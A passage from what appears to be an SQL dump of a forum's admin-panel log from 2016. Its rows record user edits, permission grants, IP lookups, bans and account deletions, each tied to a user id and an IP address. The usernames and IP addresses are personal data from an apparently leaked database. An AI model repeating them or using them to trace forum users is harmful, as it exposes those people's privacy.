'forum.php', 'edit', 'forum id = 36', '141.101.104.54'), (2231, 1, 1456238694, 'forum.php', 'update', 'forum id = 36', '141.101.104.54'), (2232, 1, 1456238695, 'forum.php', 'modify', 'forum id = 36', '141.101.104.54'), (2233, 1, 1456238698, 'forum.php', 'edit', 'forum id = 37', '141.101.104.54'), (2234, 1, 1456238702, 'forum.php', 'update', 'forum id = 37', '141.101.104.54'), (2235, 1, 1456238703, 'forum.php', 'modify', 'forum id = 37', '141.101.104.54'), (2236, 1, 1456238706, 'forum.php', 'edit', 'forum id = 17', '141.101.104.54'), (2237, 1, 1456238748, 'forum.php', 'edit', 'forum id = 38', '141.101.104.54'), (2238, 1, 1456238753, 'forum.php', 'update', 'forum id = 38', '141.101.104.54'), (2239, 1, 1456238757, 'forum.php', 'modify', 'forum id = 38', '141.101.104.54'), (2240, 1, 1456238816, 'template.php', 'modify', '', '141.101.104.54'), (2241, 1, 1456238818, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2242, 1, 1456238871, 'css.php', 'update', 'style id = 2', '141.101.104.54'), (2243, 1, 1456238872, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2244, 1, 1456243764, 'options.php', '', '', '141.101.104.54'), (2245, 1, 1456243774, 'options.php', 'options', '', '141.101.104.54'), (2246, 1, 1456243800, 'options.php', 'options', '', '141.101.104.54'), (2247, 1, 1456243837, 'options.php', 'options', '', '141.101.104.54'), (2248, 1, 1456243847, 'options.php', 'options', '', '141.101.104.54'), (2249, 1, 1456243880, 'options.php', 'options', '', '141.101.104.54'), (2250, 1, 1456243927, 'options.php', 'options', '', '141.101.104.54'), (2251, 1, 1456243980, 'options.php', 'options', '', '141.101.104.54'), (2252, 1, 1456243988, 'options.php', 'options', '', '141.101.104.54'), (2253, 1, 1456244006, 'options.php', 'options', '', '141.101.104.54'), (2254, 1, 1456244027, 'options.php', 'searchtype', '', '141.101.104.54'), (2255, 1, 1456244055, 'admininfraction.php', 'modify', '', '141.101.104.54'), (2256, 1, 1456244061, 'profilefield.php', 'modify', '', '141.101.104.54'), (2257, 1, 1456244081, 'profilefield.php', 'modifycats', '', '141.101.104.54'), (2258, 1, 1456244099, 'admininfraction.php', 'modify', '', '141.101.104.54'), (2259, 1, 1456244108, 'usertools.php', 'doips', '', '141.101.104.54'), (2260, 1, 1456244114, 'user.php', 'add', '', '141.101.104.54'), (2261, 1, 1456244114, 'user.php', 'modify', '', '141.101.104.54'), (2262, 1, 1456244118, 'user.php', 'find', '', '141.101.104.54'), (2263, 1, 1456244157, 'user.php', 'moderate', '', '141.101.104.54'), (2264, 1, 1456244169, 'announcement.php', 'modify', '', '141.101.104.54'), (2265, 1, 1456244495, 'usertools.php', 'pmstats', '', '141.101.104.54'), (2266, 1, 1456244495, 'usertools.php', 'pmstats', '', '141.101.104.54'), (2267, 1, 1456244505, 'usertools.php', 'doips', '', '141.101.104.54'), (2268, 1, 1456244530, 'admininfraction.php', 'modify', '', '141.101.104.54'), (2269, 1, 1456244535, 'profilefield.php', 'modify', '', '141.101.104.54'), (2270, 100, 1456594900, 'user.php', 'add', '', '188.114.103.246'), (2271, 100, 1456594904, 'user.php', 'modify', '', '188.114.103.246'), (2272, 100, 1456594906, 'user.php', 'find', '', '188.114.103.246'), (2273, 100, 1456594943, 'user.php', 'edit', 'user id = 383', '188.114.103.246'), (2274, 100, 1456594990, 'user.php', 'update', 'user id = 383', '188.114.103.246'), (2275, 100, 1456595005, 'user.php', 'update', 'user id = 383', '162.158.89.36'), (2276, 100, 1456595007, 'user.php', 'modify', 'user id = 383', '162.158.89.36'), (2277, 100, 1456751468, 'user.php', 'add', '', '141.101.81.20'), (2278, 100, 1456751485, 'user.php', 'update', '', '141.101.81.20'), (2279, 100, 1456751487, 'user.php', 'modify', 'user id = 385', '141.101.81.20'), (2280, 100, 1456752688, 'user.php', 'edit', 'user id = 385', '141.101.81.20'), (2281, 1, 1456754900, 'user.php', 'modify', '', '162.158.89.37'), (2282, 1, 1456754902, 'user.php', 'find', '', '162.158.89.37'), (2283, 1, 1456754909, 'user.php', 'find', '', '162.158.89.37'), (2284, 1, 1456754918, 'user.php', 'find', '', '162.158.89.37'), (2285, 1, 1456754921, 'user.php', 'find', '', '162.158.89.37'), (2286, 1, 1456754924, 'user.php', 'find', '', '162.158.89.37'), (2287, 1, 1456754942, 'user.php', 'find', '', '162.158.89.37'), (2288, 1, 1456754947, 'user.php', 'find', '', '162.158.89.37'), (2289, 1, 1456754949, 'user.php', 'find', '', '162.158.89.37'), (2290, 1, 1456754954, 'user.php', 'find', '', '162.158.89.37'), (2291, 1, 1456754959, 'user.php', 'find', '', '162.158.89.37'), (2292, 1, 1456754961, 'user.php', 'find', '', '162.158.89.37'), (2293, 1, 1456754964, 'user.php', 'find', '', '162.158.89.37'), (2294, 1, 1456754974, 'user.php', 'find', '', '162.158.89.37'), (2295, 1, 1456754979, 'user.php', 'find', '', '162.158.89.37'), (2296, 1, 1456826199, 'user.php', 'modify', '', '162.158.89.37'), (2297, 1, 1456826200, 'user.php', 'find', '', '162.158.89.37'), (2298, 1, 1456826203, 'user.php', 'find', '', '162.158.89.37'), (2299, 1, 1456826204, 'user.php', 'find', '', '162.158.89.37'), (2300, 1, 1456826207, 'user.php', 'find', '', '162.158.89.37'), (2301, 1, 1456826224, 'user.php', 'find', '', '162.158.89.37'), (2302, 1, 1456826225, 'user.php', 'find', '', '162.158.89.37'), (2303, 1, 1456826226, 'user.php', 'find', '', '162.158.89.37'), (2304, 1, 1456826227, 'user.php', 'find', '', '162.158.89.37'), (2305, 1, 1456826228, 'user.php', 'find', '', '162.158.89.37'), (2306, 1, 1456826228, 'user.php', 'find', '', '162.158.89.37'), (2307, 1, 1456826229, 'user.php', 'find', '', '162.158.89.37'), (2308, 1, 1456826231, 'user.php', 'find', '', '162.158.89.37'), (2309, 1, 1456826237, 'user.php', 'remove', 'user id = 385', '162.158.89.37'), (2310, 1, 1456826240, 'user.php', 'kill', 'user id = 385', '162.158.89.37'), (2311, 1, 1456826241, 'user.php', 'modify', '', '162.158.89.37'), (2312, 1, 1456842633, 'user.php', 'modify', '', '162.158.89.37'), (2313, 1, 1456842635, 'user.php', 'find', '', '162.158.89.37'), (2314, 1, 1456842637, 'user.php', 'find', '', '162.158.89.37'), (2315, 1, 1456842638, 'user.php', 'find', '', '162.158.89.37'), (2316, 1, 1456842639, 'user.php', 'find', '', '162.158.89.37'), (2317, 1, 1456842640, 'user.php', 'find', '', '162.158.89.37'), (2318, 1, 1456842641, 'user.php', 'find', '', '162.158.89.37'), (2319, 1, 1456842642, 'user.php', 'find', '', '162.158.89.37'), (2320, 1, 1456842643, 'user.php', 'find', '', '162.158.89.37'), (2321, 1, 1456842644, 'user.php', 'find', '', '162.158.89.37'), (2322, 1, 1456842644, 'user.php', 'find', '', '162.158.89.37'), (2323, 1, 1456842646, 'user.php', 'find', '', '162.158.89.37'), (2324, 1, 1456842651, 'user.php', 'edit', '', '162.158.89.37'), (2325, 1, 1456842669, 'user.php', 'update', '', '162.158.89.37'), (2326, 1, 1456842671, 'user.php', 'edit', 'user id = 13', '162.158.89.37'), (2327, 1, 1456842688, 'user.php', 'modify', '', '162.158.89.37'), (2328, 1, 1456842689, 'usertools.php', 'doips', '', '162.158.89.37'), (2329, 1, 1456842698, 'usertools.php', 'doips', '', '162.158.89.37'), (2330, 1, 1456842707, 'usertools.php', 'doips', '', '162.158.89.37'), (2331, 1, 1456842731, 'usertools.php', 'doips', '', '162.158.89.37'), (2332, 1, 1456842740, 'usertools.php', 'doips', 'user id = 13', '162.158.89.37'), (2333, 1, 1456842741, 'usertools.php', 'doips', '', '162.158.89.37'), (2334, 1, 1456842743, 'usertools.php', 'doips', '', '162.158.89.37'), (2335, 1, 1456842744, 'usertools.php', 'doips', '', '162.158.89.37'), (2336, 1, 1456842746, 'usertools.php', 'doips', '', '162.158.89.37'), (2337, 1, 1456842748, 'usertools.php', 'doips', 'user id = 13', '162.158.89.37'), (2338, 1, 1456842749, 'usertools.php', 'doips', '', '162.158.89.37'), (2339, 1, 1456842751, 'usertools.php', 'doips', '', '162.158.89.37'), (2340, 1, 1456842752, 'usertools.php', 'doips', '', '162.158.89.37'), (2341, 1, 1456842755, 'usertools.php', 'doips', '', '162.158.89.37'), (2342, 1, 1456842757, 'usertools.php', 'doips', '', '162.158.89.37'), (2343, 1, 1456842758, 'usertools.php', 'doips', '', '162.158.89.37'), (2344, 1, 1456842760, 'usertools.php', 'doips', '', '162.158.89.37'), (2345, 1, 1456842763, 'usertools.php', 'doips', '', '162.158.89.37'), (2346, 1, 1456842764, 'usertools.php', 'doips', '', '162.158.89.37'), (2347, 1, 1456842766, 'usertools.php', 'doips', '', '162.158.89.37'), (2348, 1, 1456842785, 'usertools.php', 'gethost', '', '162.158.89.37'), (2349, 1, 1456842793, 'usertools.php', 'doips', '', '162.158.89.37'), (2350, 100, 1457137211, 'user.php', 'modify', '', '199.27.133.29'), (2351, 100, 1457137214, 'user.php', 'find', '', '199.27.133.29'), (2352, 100, 1457137228, 'user.php', 'find', '', '199.27.133.29'), (2353, 100, 1457137237, 'user.php', 'find', '', '199.27.133.29'), (2354, 100, 1457137242, 'user.php', 'find', '', '199.27.133.29'), (2355, 100, 1457137245, 'user.php', 'find', '', '199.27.133.29'), (2356, 100, 1457137249, 'user.php', 'find', '', '199.27.133.29'), (2357, 100, 1457137252, 'user.php', 'find', '', '199.27.133.29'), (2358, 100, 1457137256, 'user.php', 'find', '', '199.27.133.29'), (2359, 100, 1457137261, 'user.php', 'find', '', '199.27.133.29'), (2360, 100, 1457137264, 'user.php', 'find', '', '199.27.133.29'), (2361, 100, 1457137278, 'user.php', 'edit', 'user id = 383', '199.27.133.29'), (2362, 100, 1457137322, 'user.php', 'update', 'user id = 383', '199.27.133.29'), (2363, 100, 1457137324, 'user.php', 'modify', 'user id = 383', '199.27.133.29'), (2364, 100, 1457200626, 'backup.php', 'choose', '', '162.158.89.24'), (2365, 100, 1457200677, 'help.php', 'answer', '', '162.158.89.24'), (2366, 100, 1457201559, 'backup.php', 'choose', '', '199.27.133.29'), (2367, 1, 1457521058, 'moderate.php', 'posts', '', '141.101.104.183'), (2368, 1, 1457521076, 'template.php', 'modify', '', '141.101.104.183'), (2369, 1, 1457521079, 'css.php', 'edit', 'style id = 2', '141.101.104.183'), (2370, 1, 1457521108, 'css.php', 'update', 'style id = 2', '141.101.104.183'), (2371, 1, 1457521110, 'css.php', 'edit', 'style id = 2', '141.101.104.183'), (2372, 1, 1457625861, 'template.php', 'modify', '', '162.158.88.99'), (2373, 1, 1457625864, 'css.php', 'edit', 'style id = 2', '162.158.88.99'), (2374, 1, 1457625973, 'css.php', 'update', 'style id = 2', '162.158.88.99'), (2375, 1, 1457625974, 'css.php', 'edit', 'style id = 2', '162.158.88.99'), (2376, 1, 1457626032, 'css.php', 'update', 'style id = 2', '162.158.88.99'), (2377, 1, 1457626033, 'css.php', 'edit', 'style id = 2', '162.158.88.99'), (2378, 1, 1457633941, 'stats.php', 'index', '', '162.158.88.99'), (2379, 1, 1457633945, 'stats.php', 'top', '', '162.158.88.99'), (2380, 1, 1457633950, 'stats.php', 'activity', '', '162.158.88.99'), (2381, 1, 1457633952, 'stats.php', 'activity', '', '162.158.88.99'), (2382, 1, 1457633977, 'adminlog.php', 'choose', '', '162.158.88.99'), (2383, 1, 1457634026, 'adminlog.php', 'choose', '', '162.158.88.99'), (2384, 1, 1457634037, 'subscriptions.php', 'transactions', '', '162.158.88.99'), (2385, 1, 1457634039, 'subscriptions.php', 'transactions', '', '162.158.88.99'), (2386, 1, 1457634045, 'subscriptions.php', 'transactions', '', '162.158.88.99'), (2387, 1, 1457634046, 'subscriptions.php', 'transactions', '', '162.158.88.99'), (2388, 1, 1457955438, 'stats.php', 'index', '', '141.101.104.183'), (2389, 1, 1457955442, 'stats.php', 'activity', '', '141.101.104.183'), (2390, 1, 1457955445, 'stats.php', 'activity', '', '141.101.104.183'), (2391, 1, 1458308008, 'user.php', 'modify', '', '85.105.178.242'), (2392, 1, 1458308011, 'user.php', 'find', '', '85.105.178.242'), (2393, 1, 1458308012, 'user.php', 'find', '', '85.105.178.242'), (2394, 1, 1458308013, 'user.php', 'find', '', '85.105.178.242'), (2395, 1, 1458308014, 'user.php', 'find', '', '85.105.178.242'), (2396, 1, 1458308016, 'user.php', 'find', '', '85.105.178.242'), (2397, 1, 1458308086, 'user.php', 'find', '', '85.105.178.242'), (2398, 1, 1458308092, 'user.php', 'edit', 'user id = 169', '85.105.178.242'), (2399, 1, 1458308111, 'usertools.php', 'doips', '', '85.105.178.242'), (2400, 1, 1458308119, 'usertools.php', 'doips', '', '85.105.178.242'), (2401, 1, 1458308240, 'admininfraction.php', 'modify', '', '85.105.178.242'), (2402, 1, 1458308247, 'usertools.php', 'doips', '', '85.105.178.242'), (2403, 1, 1458308367, 'usertitle.php', 'modify', '', '85.105.178.242'), (2404, 1, 1458308508, 'user.php', 'modify', '', '85.105.178.242'), (2405, 1, 1458308511, 'user.php', 'find', '', '85.105.178.242'), (2406, 1, 1458308517, 'user.php', 'edit', 'user id = 1', '85.105.178.242'), (2407, 1, 1458748825, 'user.php', 'modify', '', '85.105.178.242'), (2408, 1, 1458748826, 'user.php', 'find', '', '85.105.178.242'), (2409, 1, 1458748828, 'user.php', 'find', '', '85.105.178.242'), (2410, 1, 1458748829, 'user.php', 'find', '', '85.105.178.242'), (2411, 1, 1458748830, 'user.php', 'find', '', '85.105.178.242'), (2412, 1, 1458748831, 'user.php', 'find', '', '85.105.178.242'), (2413, 1, 1458748832, 'user.php', 'find', '', '85.105.178.242'), (2414, 1, 1458748833, 'user.php', 'find', '', '85.105.178.242'), (2415, 1, 1458748834, 'user.php', 'find', '', '85.105.178.242'), (2416, 1, 1458748836, 'user.php', 'find', '', '85.105.178.242'), (2417, 1, 1458748888, 'user.php', 'edit', 'user id = 283', '85.105.178.242'), (2418, 100, 1458768878, 'backup.php', 'choose', '', '5.220.244.137'), (2419, 100, 1458768903, 'user.php', 'modify', '', '5.220.244.137'), (2420, 100, 1458768916, 'user.php', 'find', '', '5.220.244.137'), (2421, 100, 1458768917, 'user.php', 'edit', 'user id = 383', '5.220.244.137'), (2422, 100, 1458768958, 'user.php', 'update', 'user id = 383', '5.220.244.137'), (2423, 100, 1458768960, 'user.php', 'modify', 'user id = 383', '5.220.244.137'), (2424, 173, 1458772765, 'user.php', 'viewuser', 'user id = 173', '216.164.19.30'), (2425, 100, 1459762944, 'user.php', 'add', '', '37.58.59.80'), (2426, 100, 1459763029, 'user.php', 'update', '', '37.58.59.80'), (2427, 100, 1459763031, 'user.php', 'modify', 'user id = 386', '37.58.59.80'), (2428, 100, 1459843362, 'user.php', 'modify', '', '104.37.190.18'), (2429, 100, 1459843369, 'user.php', 'find', '', '104.37.190.18'), (2430, 100, 1459843370, 'user.php', 'edit', 'user id = 386', '104.37.190.18'), (2431, 100, 1459843418, 'user.php', 'update', 'user id = 386', '104.37.190.18'), (2432, 100, 1459843420, 'user.php', 'modify', 'user id = 386', '104.37.190.18'), (2433, 100, 1459843426, 'adminpermissions.php', 'edit', 'user id = 386 (Spynet)', '104.37.190.18'), (2434, 100, 1459843441, 'adminpermissions.php', 'update', 'user id = 386 (Spynet) (0 » 491516)', '104.37.190.18'), (2435, 100, 1459843442, 'adminpermissions.php', '', '', '104.37.190.18'), (2436, 100, 1459843459, 'user.php', 'modify', '', '104.37.190.18'), (2437, 100, 1459843465, 'user.php', 'find', '', '104.37.190.18'), (2438, 100, 1459843483, 'user.php', 'edit', 'user id = 174', '104.37.190.18'), (2439, 100, 1459843491, 'user.php', 'edit', '', '104.37.190.18'), (2440, 100, 1459843495, 'user.php', 'find', '', '104.37.190.18'), (2441, 100, 1459843504, 'user.php', 'find', '', '104.37.190.18'), (2442, 100, 1459843511, 'user.php', 'find', '', '104.37.190.18'), (2443, 100, 1459843517, 'user.php', 'find', '', '104.37.190.18'), (2444, 100, 1459843522, 'user.php', 'find', '', '104.37.190.18'), (2445, 100, 1459843526, 'user.php', 'find', '', '104.37.190.18'), (2446, 100, 1459843532, 'user.php', 'edit', '', '104.37.190.18'), (2447, 100, 1459843536, 'user.php', 'edit', '', '104.37.190.18'), (2448, 100, 1459843549, 'user.php', 'modify', '', '104.37.190.18'), (2449, 100, 1459843555, 'user.php', 'find', '', '104.37.190.18'), (2450, 100, 1459843556, 'user.php', 'edit', '', '104.37.190.18'), (2451, 100, 1459843573, 'usergroup.php', 'modify', '', '104.37.190.18'), (2452, 100, 1459843611, 'ranks.php', 'modify', '', '104.37.190.18'), (2453, 100, 1459843623, 'user.php', 'modify', '', '104.37.190.18'), (2454, 100, 1459843629, 'user.php', 'find', '', '104.37.190.18'), (2455, 100, 1459843629, 'user.php', 'edit', 'user id = 386', '104.37.190.18'), (2456, 100, 1459843637, 'user.php', 'update', 'user id = 386', '104.37.190.18'), (2457, 100, 1459843639, 'user.php', 'modify', 'user id = 386', '104.37.190.18'), (2458, 100, 1459843643, 'user.php', 'edit', 'user id = 386', '104.37.190.18'), (2459, 100, 1459843673, 'announcement.php', 'modify', '', '104.37.190.18'), (2460, 100, 1459843697, 'announcement.php', 'add', '', '104.37.190.18'), (2461, 100, 1459843705, 'announcement.php', 'modify', '', '104.37.190.18'), (2462, 100, 1459843708, 'announcement.php', 'add', '', '104.37.190.18'), (2463, 100, 1459843713, 'announcement.php', 'modify', '', '104.37.190.18'), (2464, 100, 1459843731, 'forum.php', 'modify', '', '104.37.190.18'), (2465, 100, 1459843750, 'announcement.php', 'add', '', '104.37.190.18'), (2466, 100, 1459843752, 'announcement.php', 'modify', '', '104.37.190.18'), (2467, 100, 1459843753, 'announcement.php', 'modify', '', '104.37.190.18'), (2468, 100, 1459843759, 'announcement.php', 'add', '', '104.37.190.18'), (2469, 100, 1459843770, 'user.php', 'modify', '', '104.37.190.18'), (2470, 100, 1459843775, 'user.php', 'find', '', '104.37.190.18'), (2471, 100, 1459843775, 'user.php', 'edit', 'user id = 386', '104.37.190.18'), (2472, 100, 1459843785, 'user.php', 'editaccess', 'user id = 386', '104.37.190.18'), (2473, 100, 1459843794, 'user.php', 'updateaccess', 'user id = 386', '104.37.190.18'), (2474, 100, 1459843796, 'user.php', 'edit', 'user id = 386', '104.37.190.18'), (2475, 1, 1462464191, 'user.php', 'modify', '', '85.105.178.242'), (2476, 1, 1462464193, 'user.php', 'find', '', '85.105.178.242'), (2477, 1, 1462464197, 'user.php', 'edit', 'user id = 164', '85.105.178.242'), (2478, 1, 1462464225, 'user.php', 'update', 'user id = 164', '85.105.178.242'), (2479, 1, 1462464227, 'user.php', 'modify', 'user id = 164', '85.105.178.242'), (2480, 100, 1462892146, 'user.php', 'modify', '', '94.50.7.155'), (2481, 100, 1462892149, 'user.php', 'find', '', '94.50.7.155'), (2482, 100, 1462892155, 'user.php', 'remove', 'user id = 164', '94.50.7.155'), (2483, 100, 1463694602, 'user.php', 'add', '', '5.220.255.27'), (2484, 100, 1463694655, 'user.php', 'update', '', '5.220.255.27'), (2485, 100, 1463694657, 'user.php', 'modify', 'user id = 387', '5.220.255.27'), (2486, 100, 1463694861, 'user.php', 'edit', 'user id = 387', '5.220.255.27'), (2487, 100, 1463694872, 'user.php', 'update', 'user id = 387', '5.220.255.27'), (2488, 100, 1463694874, 'user.php', 'modify', 'user id = 387', '5.220.255.27'), (2489, 100, 1463694940, 'user.php', 'edit', 'user id = 387', '5.220.255.27'), (2490, 100, 1463694950, 'user.php', 'update', 'user id = 387', '5.220.255.27'), (2491, 100, 1463694951, 'user.php', 'modify', 'user id = 387', '5.220.255.27'), (2492, 387, 1463695484, 'banning.php', 'banuser', '', '5.79.68.161'), (2493, 100, 1463695512, 'user.php', 'edit', 'user id = 387', '5.220.255.27'), (2494, 387, 1463695846, 'forum.php', 'modify', '', '5.79.68.161'), (2495, 387, 1463695860, 'announcement.php', 'add', '', '5.79.68.161'), (2496, 387, 1463696060, 'announcement.php', 'update', '', '5.79.68.161'), (2497, 387, 1463696062, 'forum.php', '', '', '5.79.68.161'), (2498, 387, 1463696070, 'announcement.php', 'edit', 'announcement id = 1', '5.79.68.161'), (2499, 100, 1463696148, 'user.php', 'edit', 'user id = 173', '5.220.255.27'), (2500, 100, 1463696159, 'user.php', 'update', 'user id = 173', '5.220.255.27'), (2501, 100, 1463696161, 'user.php', 'modify', 'user id = 173', '5.220.255.27'), (2502, 100, 1463696268, 'usergroup.php', 'modify', '', '5.220.255.27'), (2503, 100, 1463696275, 'usergroup.php', 'edit', 'usergroup id = 5', '5.220.255.27'), (2504, 100, 1463696295, 'passwordcheck.php', '', '', '5.220.255.27'), (2505, 100, 1463696305, 'user.php', 'modify', '', '5.220.255.27'), (2506, 100, 1463696313, 'user.php', 'find', '', '5.220.255.27'), (2507, 100, 1463696345, 'user.php', 'edit', '', '5.220.255.27'), (2508, 100, 1463696346, 'user.php', 'edit', 'user id = 188', '5.220.255.27'), (2509, 100, 1463696347, 'user.php', 'edit', '', '5.220.255.27'), (2510, 100, 1463696349, 'user.php', 'edit', '', '5.220.255.27'), (2511, 100, 1463696350, 'user.php', 'edit', '', '5.220.255.27'), (2512, 100, 1463696352, 'user.php', 'edit', '', '5.220.255.27'), (2513, 100, 1463696352, 'user.php', 'edit', 'user id = 386', '5.220.255.27'), (2514, 100, 1463696354, 'user.php', 'edit', '', '5.220.255.27'), (2515, 100, 1463696356, 'user.php', 'modify', '', '5.220.255.27'), (2516, 100, 1463696363, 'user.php', 'find', '', '5.220.255.27'), (2517, 100, 1463696368, 'user.php', 'edit', '', '5.220.255.27'), (2518, 100, 1463696370, 'user.php', 'edit', '', '5.220.255.27'), (2519, 100, 1463696371, 'user.php', 'edit', '', '5.220.255.27'), (2520, 100, 1463696373, 'user.php', 'edit', '', '5.220.255.27'), (2521, 100, 1463696374, 'user.php', 'edit', '', '5.220.255.27'), (2522, 100, 1463696374, 'user.php', 'modify', '', '5.220.255.27'), (2523, 100, 1463696382, 'user.php', 'find', '', '5.220.255.27'), (2524, 100, 1463696390, 'user.php', 'edit', '', '5.220.255.27'), (2525, 100, 1463696399, 'user.php', 'edit', '', '5.220.255.27'), (2526, 100, 1463696402, 'user.php', 'edit', 'user id = 1', '5.220.255.27'), (2527, 100, 1463696415, 'user.php', 'update', 'user id = 188', '5.220.255.27'), (2528, 100, 1463696417, 'user.php', 'modify', 'user id = 188', '5.220.255.27'), (2529, 100, 1463696422, 'user.php', 'update', '', '5.220.255.27'), (2530, 100, 1463696446, 'user.php', 'update', 'user id = 386', '5.220.255.27'), (2531, 100, 1463696485, 'user.php', 'modify', '', '5.220.255.27'), (2532, 100, 1463696493, 'user.php', 'find', '', '5.220.255.27'), (2533, 100, 1463696518, 'banning.php', 'banuser', '', '5.220.255.27'), (2534, 100, 1463696530, 'user.php', 'modify', '', '5.220.255.27'), (2535, 100, 1463696594, 'user.php', 'find', '', '5.220.255.27'), (2536, 100, 1463696611, 'user.php', 'remove', 'user id = 152', '5.220.255.27'), (2537, 100, 1463696618, 'user.php', 'remove', 'user id = 152', '5.220.255.27'), (2538, 100, 1463696623, 'user.php', 'kill', 'user id = 152', '5.220.255.27'), (2539, 100, 1463696625, 'user.php', 'modify', '', '5.220.255.27'), (2540, 100, 1463696645, 'user.php', 'find', '', '5.220.255.27'), (2541, 100, 1463696651, 'user.php', 'edit', 'user id = 156', '5.220.255.27'), (2542, 100, 1463696660, 'user.php', 'edit', 'user id = 132', '5.220.255.27'), (2543, 100, 1463696662, 'user.php', 'edit', 'user id = 142', '5.220.255.27'), (2544, 100, 1463696664, 'user.php', 'edit', 'user id = 137', '5.220.255.27'), (2545, 100, 1463696665, 'user.php', 'edit', 'user id = 120', '5.220.255.27'), (2546, 100, 1463696667, 'user.php', 'edit', 'user id = 108', '5.220.255.27'), (2547, 100, 1463696668, 'user.php', 'edit', 'user id = 119', '5.220.255.27'), (2548, 100, 1463696670, 'user.php', 'edit', 'user id = 147', '5.220.255.27'), (2549, 100, 1463696671, 'user.php', 'edit', 'user id = 134', '5.220.255.27'), (2550, 100, 1463696674, 'user.php', 'edit', 'user id = 110', '5.220.255.27'), (2551, 100, 1463696677, 'user.php', 'edit', 'user id = 146', '5.220.255.27'), (2552, 100, 1463696678, 'user.php', 'edit', 'user id = 157', '5.220.255.27'), (2553, 100, 1463696681, 'user.php', 'edit', 'user id = 140', '5.220.255.27'), (2554, 100, 1463696684, 'user.php', 'edit', 'user id = 122', '5.220.255.27'), (2555, 100, 1463696685, 'user.php', 'edit', 'user id = 111', '5.220.255.27'), (2556, 100, 1463696688, 'user.php', 'edit', 'user id = 106', '5.220.255.27'), (2557, 100, 1463696688, 'user.php', 'edit', 'user id = 105', '5.220.255.27'), (2558, 100, 1463696692, 'user.php', 'edit', 'user id = 149', '5.220.255.27'), (2559, 100, 1463696694, 'user.php', 'edit', 'user id = 113', '5.220.255.27'), (2560, 100, 1463696698, 'user.php', 'edit', 'user id = 107', '5.220.255.27'), (2561, 100, 1463696701, 'user.php', 'edit', 'user id = 141', '5.220.255.27'), (2562, 100, 1463696704, 'user.php', 'edit', 'user id = 124', '5.220.255.27'), (2563, 100, 1463696705, 'user.php', 'edit', 'user id = 159', '5.220.255.27'), (2564, 100, 1463696708, 'user.php', 'edit', 'user id = 139', '5.220.255.27'), (2565, 100, 1463696710, 'user.php', 'edit', 'user id = 131', '5.220.255.27'), (2566, 100, 1463696712, 'user.php', 'edit', 'user id = 118', '5.220.255.27'), (2567, 100, 1463696872, 'user.php', 'update', 'user id = 156', '5.220.255.27'), (2568, 100, 1463696878, 'user.php', 'update', 'user id = 132', '5.220.255.27'), (2569, 100, 1463696880, 'user.php', 'modify', 'user id = 132', '5.220.255.27'), (2570, 100, 1463696884, 'user.php', 'update', 'user id = 142', '5.220.255.27'), (2571, 100, 1463696886, 'user.php', 'modify', 'user id = 142', '5.220.255.27'), (2572, 100, 1463696892, 'user.php', 'update', 'user id = 137', '5.220.255.27'), (2573, 100, 1463696901, 'user.php', 'update', 'user id = 120', '5.220.255.27'), (2574, 100, 1463696907, 'user.php', 'update', 'user id = 108', '5.220.255.27'), (2575, 100, 1463696908, 'user.php', 'modify', 'user id = 108', '5.220.255.27'), (2576, 100, 1463696914, 'user.php', 'update', 'user id = 119', '5.220.255.27'), (2577, 100, 1463696919, 'user.php', 'update', 'user id = 147', '5.220.255.27'), (2578, 100, 1463696922, 'user.php', 'modify', 'user id = 147', '5.220.255.27'), (2579, 100, 1463696926, 'user.php', 'update', 'user id = 134', '5.220.255.27'), (2580, 100, 1463696932, 'user.php', 'update', 'user id = 110', '5.220.255.27'), (2581, 100, 1463696940, 'user.php', 'update', 'user id = 146', '5.220.255.27'), (2582, 100, 1463696946, 'user.php', 'update', 'user id = 157', '5.220.255.27'), (2583, 100, 1463696950, 'user.php', 'update', 'user id = 140', '5.220.255.27'), (2584, 100, 1463696954, 'user.php', 'update', 'user id = 122', '5.220.255.27'), (2585, 100, 1463696961, 'user.php', 'update', 'user id = 111', '5.220.255.27'), (2586, 100, 1463696966, 'user.php', 'update', 'user id = 106', '5.220.255.27'), (2587, 100, 1463696971, 'user.php', 'update', 'user id = 105', '5.220.255.27'), (2588, 100, 1463696975, 'user.php', 'update', 'user id = 149', '5.220.255.27'), (2589, 100, 1463696980, 'user.php', 'update', 'user id = 113', '5.220.255.27'), (2590, 100, 1463696985, 'user.php', 'update', 'user id = 107', '5.220.255.27'), (2591, 100, 1463696989, 'user.php', 'update', 'user id = 141', '5.220.255.27'), (2592, 100, 1463696993, 'user.php', 'update', 'user id = 124', '5.220.255.27'), (2593, 100, 1463696998, 'user.php', 'update', 'user id = 159', '5.220.255.27'), (2594, 100, 1463697004, 'user.php', 'update', 'user id = 139', '5.220.255.27'), (2595, 100, 1463697010, 'user.php', 'update', 'user id = 131', '5.220.255.27'), (2596, 100, 1463697012, 'user.php', 'modify', 'user id = 131', '5.220.255.27'), (2597, 100, 1463697019, 'user.php', 'update', 'user id = 118', '5.220.255.27'), (2598, 100, 1463697020, 'user.php', 'modify', 'user id = 118', '5.220.255.27'), (2599, 100, 1463697364, 'user.php', 'update', 'user id = 387', '5.220.255.27'), (2600, 100, 1463697366, 'user.php', 'modify', 'user id = 387', '5.220.255.27'), (2601, 100, 1463697398, 'user.php', 'find', '', '5.220.255.27'), (2602, 100, 1463697403, 'user.php', 'modify', '', '5.220.255.27'), (2603, 100, 1463697423, 'user.php', 'find', '', '5.220.255.27'), (2604, 100, 1463697526, 'forum.php', 'modify', '', '5.220.255.27'), (2605, 387, 1463697602, 'announcement.php', 'update', '', '176.126.252.12'), (2606, 100, 1463697616, 'forum.php', 'modify', '', '5.220.255.27'), (2607, 387, 1463697617, 'announcement.php', 'edit', 'announcement id = 1', '176.126.252.12'), (2608, 100, 1463697617, 'forum.php', 'add', '', '5.220.255.27'), (2609, 100, 1463697619, 'forumpermission.php', 'modify', '', '5.220.255.27'), (2610, 100, 1463697648, 'forumpermission.php', 'modify', '', '5.220.255.27'), (2611, 100, 1463697649, 'moderator.php', 'showlist', '', '5.220.255.27'), (2612, 100, 1463697658, 'moderator.php', 'editglobal', 'user id = 29', '5.220.255.27'), (2613, 100, 1463697658, 'moderator.php', 'editglobal', 'username = Yakuza112', '5.220.255.27'), (2614, 100, 1463697673, 'moderator.php', 'showlist', '', '5.220.255.27'), (2615, 100, 1463697678, 'user.php', 'edit', 'user id = 29', '5.220.255.27'), (2616, 100, 1463697697, 'user.php', 'update', 'user id = 29', '5.220.255.27'), (2617, 100, 1463697698, 'user.php', 'modify', 'user id = 29', '5.220.255.27'), (2618, 100, 1463697702, 'user.php', 'edit', 'user id = 30', '5.220.255.27'), 